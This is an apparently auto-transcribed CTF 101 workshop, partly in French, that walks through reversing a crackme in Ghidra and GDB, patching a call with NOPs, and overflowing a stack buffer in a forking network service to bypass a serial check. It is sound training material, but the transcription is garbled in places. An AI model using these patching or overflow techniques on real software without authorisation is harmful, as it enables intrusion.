de char donc nous savons maintenant que le dramatique est la fonction dramatique et le on dirait que vous avez pris la binary sans les symboles vous pouvez faire le même travail vous pouvez procéder exactement de la même manière et vous avez labeled ça peut-être perdre de temps ou vous savez j'ai hâte d'utiliser des trucs comme ça mais c'est la même technique de label pour comprendre ce qui se passe avec la réversation. Ok maintenant en arrivant à la partie intéressante on a un variable ici qui est refermé ici qui est printé comme séquence de x et ça semble être juste un éterrateur Right? Going through the string so this we can rename to I and here here here here so okay so L var is so this is probably a char pointer so we can re type a variable to that so now we'll have an array access instead of of the arithmetic that we had before so it's more straightforward what's going on but the compute method now is casting okay so it means that it this is just display in compute is happening what we're interested in let's dive into it okay so we got some mumbo jumbo um a lot of of variables that on the stack so you remember local variable variables define in the body of a function in c are gonna be on the stack in in the CPU so here they are and this is a compiler optimization by the way this is not how I wrote the challenge the compiler said oh this is small enough or you know used only locally so I'm gonna I'm gonna just put it that way since we're on 64 bit maybe on 32 bit it wouldn't have done the same but it makes it a little bit more obscure and Ida pro shows it like boom you have the the string you know exactly what's going on I don't know what the optimized here but Guaidra doesn't have that optimization but still we by looking we can see that these are values that are all around the printable ASCII range right and this is this is based on experience you will not know that but eventually you'll you'll you'll have these reflexes so 20 is a space so 0x20 this is all x is a space so you have a bunch of 20 73 is is in the printable range 54 as well 6e as well so we know that we could try to convert them but first let's let's figure out so they all get assigned and then the length is calculated and then there's a memory that is allocated and then shawan of this the beginning of the string but using the address with the length that was previously calculated so this probably means that it is the shawan of this and then the result is going into that variable that was allocated with malloc and then it's returning a point third to that that value so we have something like a sha go shawan going on and if we look at the api of sha again you know leveraging man pages we would we would stumble upon open ssl man pages which have the which have the signatures for these methods oh i i seem to be using a shortcut function here because there's no in it update and final but md can be seen here and it's an unsigned char pointer uh oh no shawan is here it's here okay so unsigned char pointer the size and then the destination so again if we want to do this in pure static fashion we need to extract that string right so we can try so this thing here we can try to convert the type and then put it as a char sequence but then we we we see it kind of backwards char sequence and no way there is no way so it's kind of upside down right um i'm gonna admit people uh and then when we look at the the compiler view uh it it gets casted into an int when we do this so guide row is clearly not helping us here so what we're gonna do uh instead of and this is where we combine dynamic and static but i'm interested in doing the short computation statically and depending on the challenge you know this could save you time right if there is a gatekeep function that spins or that you can't skip or anti debugging in the way um you can jump into specific parts of the challenge figure them out dynamically then come back to a static so what this is what we're gonna do we're gonna break on compute and then we're gonna break on uh we're gonna stop here so that we have the fully assembled uh string in our hands right so right here a pointer to the the rax should have the full string so let's let's look at this uh ngd could we use the addresses in guide rows interface to pinpoint uh directly the address uh before string line uh uh i think it's possible but as you can see uh in gdb they are pref prefixed with uh 5555 so let's just there might be so never mind what's that and the binary might have a pi enabled so never mind that won't work unless you have correct offset yeah yeah yes exactly the so there are a couple of of compiler settings and security features that could make this more difficult in this in this case and you know i always i i not often was able to map easily from the let's say an the x view to the the compiler view to the the dynamic gdb view but i know that it's it's clairement feasible right but um i think here we would need to add uh like this but is the rest zeros and if and you can probably extract it from one of the info string strings the base address and then add this value to the base address so i think it could be done but the but jumping directly uh to the the spot is is not that uh difficult so i'm not gonna bother but it's a very good point um okay so we are in that function and we're gonna just run so the strings are getting uh moved right so you see move absolu in rax and you see that rax has there is in the right uh byte ordering for us humans to understand so there is no way and then you are ever you know it's it's making sense right going and then when we are at the call pouf there is no way you are ever going to figure this out and so if we take this string and then uh echo it and uh hash it with sha one this is uh the flag right you take this and then you add flag dash at the beginning and this is our flag so we were able to do it by combining the the approach a little bit uh and i i looked today uh trying to find if there was a stack string reconstructor and i was pointed to uh uh script the script manager and there's a bunch of stuff here but it seems that the stack script is is not uh part of that but it's very interesting to know that there's so much script going on that could help you know that now that i have a filter so it's not there and it seems all well classified so it's it's guide rise is really you know taking off and and i think it's getting more and more powerful and eventually i think i think this challenge is going to be a lot easier to solve in guide room um are there i can take time for questions since the i can do the bonus i don't mind but the bonus is is clearly just another layer of complexity we need to compile the project we need to try to attack it and so on so it's it's more involved but and and not that much but still so i but i would rather take questions now si on a des questions et ensuite move on to the the binary the scoreboard is exploding oh eric a 12 so he he figure out the the binary okay so i'm gonna check questions okay so the question is can guide rubby use to erase the raise call and it's possible to patch binaries with gaigre but i know that in 9.2 there was a bug where it wouldn't work but i don't know about 9.3 which is what i'm on right now but i can explain to you the approach so the approach of patching out a call is to basically find where it is and then so you have so this is basically if you look at the x editor this is what you have in there this is the machine code the machine code is translated into by a disassembler translated into disassembly language which is meant for human and the disassembly language is combined with with its context to be decompiled into pseudo c which is even more meant for humans so the idea of erasing this call would be to patch the instructions this processor received the rating of gold during testing you should rarely encounter an error but please let us know if you do okay constructing assembler okay so what i want to do here here here oh i i i want a patch but not i want to patch with machine code okay now let's let's patch instruction let's do that let's do nup so nup basically is 0x90 and i will nup all the things so nup is no operation and basically this just says do nothing and you need to nup everything right because nup is a one uh one byte instruction and so uh if the the the cp if the cpu would execute that instruction it would move on to the next byte and and here you can see that the disassembler doesn't know so he would it would crash here and even the compiler just said add bad data so the decompiler so you need to basically patch the whole set the whole sequence boom and so we don't have a raised call anymore and let's try now we need to extract that save that out our nup several nups in a row when used in an exploitation context are called a nup slide and this is used when you jump somewhere but you're not sure where exactly so you just put the slide so that eventually it's going to execute your shellcode but so this looks like it's trying to export no save crack me as let's try that i'm looking at where is the stuff did i am i missing it no no no no no no it's probably i should probably do something like export it export okay binary as i said earlier this used to be a known buggy yeah that's not gonna work it's it's not the same size at all it needs to be an elf i guess okay let's try again uh export no export program let's do elf not selection everything fail to get relocation not looking good i i i don't know how to do this to be honest uh so i think we're gonna we're gonna skip uh if anyone knows but but the the strategy is that one right and oh what we could do oh could we do something crazy like this so basically to be honest what we could do is let's say you you uh you google not google you you search the previous call the x the sequence of x byte that was there and then in an ex editor and you change this by 99998 of the same length you could probably run that and it should work so uh should i try or should i move to the bonus anyone has input now i i think i think the issue is the is guide rule i don't know how they're exporting works right it's not just file size it's a completely different thing it's not even close to the file of the original binary so it's look it looks like it's reconstructing it and you know dropping a bunch of stuff so someone says try the other one says bonus yeah they want the bonus they want a bonus okay let's go with bonus oh and by the way i think maybe once uh in a while your screen glitches like you said it might okay should i do do something about it it's not really often i don't know you you seem to know how to fix it by moving between workspaces or something like that yeah yeah yeah i can try okay did never mind it's really uh viewable anyways no so i'll i'll have the guide rule in a separate screen but i'm gonna do a bunch of gdb so let's just close guide rule i think this gonna fix a half of it uh yes oh can i yeah relocation i don't know why does that i don't know i've never i haven't done this to be honest um okay up my bike i draw okay bonus the bonus uh so um the so it's a demon a program written in c that runs on the server if we look at it so it's a classic you know exploitation challenge here let's put us back in presentation just just for this quick net cap so we are gonna connect on this at this port and so it says please enter your serial number and we say nort sec is the best which is obviously the good serial number oh it says wrong serial number so that's the service now as is classic with exploitation challenges we uh runs on 1404 you get a sense of how old this thing is um but i mean it still applies and i i compiled it today on my arch and it's working and also yeah you'll you'll be able to solve it um and i think eric eric did uh two solves actually um so the source code is there and you get some context getting started so you know as is classic with crack me with où you have the source you need to break it locally because you can debug and then you eventually try your payload on the server so uh we're gonna download the source we should call them phone service and then uh it says here okay i need to create a service dot dot h otherwise it won't compile and this is you know a classic way or an old school way of decoupling the flag from the the source code so uh you uh you you basically input a false flag in your in the the program so let's go and do that service service dot h and then yay okay now back to the thing compile it with this and execute it with service so we compile it we get a couple of warnings but nothing is fatal so we should have uh binary we do so we can run it and uh we get a problem and uh if i do this oh no i was not great i think i'm the right thing okay oh i'm debugging it somewhere else let's kill that okay uh running service you know what so okay that's a good trick i'm gonna show you we know that this thing runs on port 12345 and i know it's confusing because on the server it's 2389 but this was changed to bypass uh outbound firewalls on arbitrary ports uh so i i kind of remap it using docker compose but uh but if you look at the source of the service file oops not the binary the source uh you can find where the socket is created so server address send port uh so this is c h host to uh it's packing basically this for the the socket structure and uh it's net network order something anyway this is the port uh and this is the address and this is a shorthand for zero zero zero zero zero so don't run this it's not super exploitable like it's kind of a more of a logic problem but it's still something you shouldn't run all the time like i was doing apparently um but anyway i'm behind net uh so uh with now that we know the port what we could do with uh when we are root on our system is list the the all of the services with uh so no net net network name resolution all the services and with the process and the process flag is the one that requires sudo so with this you'll find the uh the process that is still running so now i know that i need to kill this guy and it's probably the one i was trying to kill earlier actually no it was not so uh one thing to note of that and i think this is mentioned in the the challenge is it it uses a fork call so this makes gdb being confused quite easily so uh and and it creates the situation where the process is still running and you kill one and the other one's still there so basically anytime it receives a connection it forks itself and the child handles the connection so uh an old strategy very common back in the day and this this means debugging should be adjusted accordingly in order to follow the child which is given instructions there but also means that when you are in gdb when you kill your window the thing that the parent est still running so you need to do do then what i just did again to find it and kill it so and it's it's annoying but this these little details is what can make you not solve a challenge and it's nothing related to the challenge or super technical so this is kind of the intent of this is that you really need to understand a lot of what's going on in order to solve these challenges like these and these these demon doing fork calls challenges used to be very there used to be a lot of them back then um okay so moving from there we should be able to run the service and the server is ready so now let's take a poke at it let's put it us in presentation mode et voilà wrong serial number okay so we are set up to uh debug locally now i want we're gonna run this in gdb with the fancy uh output and we're gonna keep this here maybe a bit smaller and here we'll make it smaller too so gdb the service we're gonna run this guy and so we have a server ready but uh and if we connect are we debugging it's not clear okay so we need to figure out where we need to break and and and see from there what we can do so uh good place so basically okay so if we look at the things uh the it's listening all the time and when a connection is accepted it's forking into session the session method okay let's look at the session method this is the session method please enter your serial number succeeded or wrong number here so what we want to do is we want to make this go the other way right so from validate we want to switch to uh a true return to a false return but we will not be able to change the source code on this server so we need to do this locally without changing the source code but in order to understand what's going on debugging there is is going to be very interesting and important so let's start again gdb service let's break on validate and then run now oh can't bind address in use this is what i was talking about and i want you to take note that i did change set follow fork mode to child in my gdb environment so anytime there is a fork call i'm following the child not the parent because of the nature of what we're trying to debug here this is very important otherwise we'll be like hey my breakpoint never triggers and not don't understand why so this and let's kill again that listening service mine eight one it's gone are are they all gone yes okay let's start again now run uh no break on validate run okay and then connect uh uh uh uh or not let's have something better here okay thread hit where are we invalidate uh okay string copy at the bottom the rest we don't really understand and this is when you're like wait a minute but i have source code there's gotta be another way right how come i it's not prettier than this so aha you forgot when you compiled your program to add the gcc at the like this is not just symbols this is like the whole dwarf metadata stuff so that you can fully debug along with source code so this is you add dash j i know that in my notes or in the challenge notes i have dash j do i have nothing oh it's not there okay i did i i said nothing um so add dash j for debugging and uh if we do that we get the same warnings we get a larger binary and we need to kill the service uh probably i could do kill all but okay so what i just did i recompile service i added the dash j which means that all the bug information should be in it right i'm gonna still break invalidate i'm gonna run it and we're gonna compare notes with the previous time we ran it let's connect uh let's send this payload and so oh look at that we have source code instead of assembly oh my god so uh we okay array allocation string copy we can take a look at uh variable content so buff has this in it but it hasn't been allocated yet uh now it has this in it so value one okay so basically let's uh just jump quickly back into source code so validate we need it to return something we need it to return a true value and what it does is is that it compares value one with value two and if they are equal it will return a true value where is the bug where is the bug the bug is that it gets a char pointer at input okay that is not validated uh and it will inject a zero in it so that the string copy would stop eventually on the first copy but not on the second one and the second one is an input to another compute value but if you look at the way the stack is laid out so value one value two value uh buffer okay if you overwrite in buffer you will overwrite up so basically in this string copy here we can write up into value two and value one but the difficulty lies in that the fact that value two is computed after our string copy otherwise we could have just said a a a equals a a a and we would be done with it but the problem that this is done after it means that we need to try and do a lot of trial and errors in order to find the value of course uh more seasoned exploit people would probably have a way to solve this using uh anger or stuff like that right but this is CTF 101 let's not be ahead of ourselves we'll we'll do this by um looking iterating and try so first we need to do that overflow so let's we we're looking at buff and at value one and value two so content of value one is on the stack uh we should see it somewhere yeah how come the instruction pointer is not oh no i did uh no no no what should i do uh just next so i did an i for next instruction instead of next uh so this is why i was confused um okay so we have on the stack abcdfg and then this is the buff overflow uh now if we look at buff what do we have we have just garbage right because we didn't write enough characters so now this garbage is going to be sent to the compute function and now uh oops that's not and now we have uh binary compared to binary so no chance of winning here uh and and the everything is is smaller by the way and it's e instead of r because we're dealing with a 32 bit uh binary and uh crack me was a 64 bit uh one so uh here we're nowhere close to uh what we want to achieve so uh we're gonna continue and we're gonna try another one so let's go with this and the reason why i'm putting different characters is that you uh you you can see visually eventually where and give can give you an idea of what to change in the in the payload uh so ah damn it i i didn't do the i was distracted by the chat i'm gonna issue it again oops okay so i was close to the the size to do the overflow and so the program that the this child crashed and because of that i need to recycle the whole thing if i do kill all of service is that working yeah i think it's enough okay so breaking on validate and then running i see that i'm i'm running out of time but i just want to show might not get to the solution because i want to wrap up but don't want to take much of your time because you'll be in front of a computer for a long time uh this weekend for those who are playing ctf okay so uh next next next so what we have now we copied this over okay so we have here jklm comparing with nopq so something slightly flipped right and so eventually as you you try values on this you you uh you you you basically compute takes your input and shuffles it and the fact that the value is computed on top of both it means that every every time you change what you send you you shuffle around with the the what is done in compute and so it gets kind of of harder you're not necessarily getting closer and another important note is that you need to uh reverse the the because of the of the the way memory works right you need to send it backwards when you send it in the the command line so and uh otherwise it's not it's not gonna align but the i i i want to i i'm rushing a little bit because i want to get to the post uh uh the the post stuff but i i do want to show demonstrate to you a working payload so i'm i'm just gonna cheat a little bit and jump to the one that i know works and i still gonna struggle a bit with it but uh i think i'm gonna be close and we'll be able to debug it together oops so if i do that um next so it's it's too long i'm gonna make it shorter so i'm gonna uh reduce it by four i think you move more than four characters the beginning four three four okay yeah around this and then this this is it too long or too short that's what i'm wondering okay yeah yeah uh ah that's that's what messes with my head here we see the give me one sec okay i cheated i grabbed the a correct one that was debugging it okay let's start over i'm just gonna show you to kill this one kill restart break holiday connect is it running so we have the okay yeah there there's kind of a copy here of its own stuff to be honest i forgot the details but that is enough to get it uh to succeed and so basically the yay is my own stuff locally right and so now if we do that on ctf101.etc.io 3389 and then put that in we get uh stack corruption for the win so again this is not buffer well this is a buffer flow but it's not you're not changing the return address you are uh you are corrupting inside of the of the method so it's not uh it's it's not exploitation per say well it is because you overwrite a buffer but you don't you don't because there there is a stack canary uh oh no there's no there's no stack canary um so okay so there's no stack canary but but there is um if if you do the full exploit it's i think it's harder and more complicated than um then just just abusing this to override the value and i think the fact that you're dealing with a fork every time could have some implications also towards the full exploitation all this to say that i've never seen this exploited in a traditional way only exploited logically inside its own stack and someone better than me at sea could understand what compute is doing and then reverse it or or just use anger but but you know since it's over a network it's it's a it requires a bit of setup that is more involved than what i demonstrated today but but all this to say that there are again you know various ways to achieve exploitation of that challenge uh now let's put that in i i haven't validated that flag earlier so i'm not even sure if it's solvable oh that's not the good one sec but oh yeah it does work oh and er and eric had it before we had uh the other solves so yes all right um i i wanted to finish on uh and and i know we're late but that's the beauty of being the last workshop i can have you a couple extra minutes um i wanted to finish by talking about two things so again if you were familiar with any of the the techniques that i talked about today well this was city f101 so this was not you were not the intended audience but i hope that everyone learned at least one trick or two but but still like this is really the basics on how not to be intimidated by specific challenges this is in no way a a class on how to organize or how to acquire depth in specific sets of challenges in order to um to do to reach this these other skill sets uh what i recommend is that you look at other training exercises like montry hack uh or and and they were all partners of north sec mentioned here so ring zero team online um which has a ton of challenges in a great community that you can do at your own pace montry hack is more like what we did tonight we uh we go together through a challenge and there's more uh on your own type work it's not just presentation but it is you know a bit of the two we work together and there are our tables and people can talk to each other using discord and so on and uh lately all our videos have been uh uploaded on twitch oops i should actually put montry hack you know otherwise what's gonna be and so uh you can listen to a lot of the stuff that we did uh before um the you know malware analysis the hackfest ctf oh camel type stuff uh we have a lot of previous videos we will eventually um uh put them on on youtube as well i think uh but it's it's a lot of fun i think and and it's that depend on your learning style um and uh last thing i wanted to plug is we had where did i put this so the youtube of north sec we had a qna this week that have someone very interesting uh not someone something very interesting for people who want to develop the depth that we talked about uh a couple minutes ago where is where am i gonna find this i think this is the spot so i'm gonna share the link yes okay so that's the score but right here okay lana speaks about uh challenge design and there's nothing better than to be in the head of a designer but then afterwards the winners of last year's north sec one of the winners of last year's north sec david speaks about team organization so how did they delegate tasks how did they organize around in discord so this i'm gonna share the link to this with the the timestamp uh right now and i think so i i think that if this was really the one on one with a 201 or the way to uh regroup or approach uh ctf remotely is gonna be addressed more in these types of presentation in this presentation so i'm sharing it right now uh while i do so uh does anyone has any questions don't be shy but it's okay if you don't have i guess everything was clear or not but uh all right excellent and um i hope you you will have fun at the the ctf uh and thanks for being with us all that time it's a it's a it's a drag it's three hours of this is very intense so you're doing all already doing good steps towards having fun thanks everyone well thank you it was really interesting have a great night everyone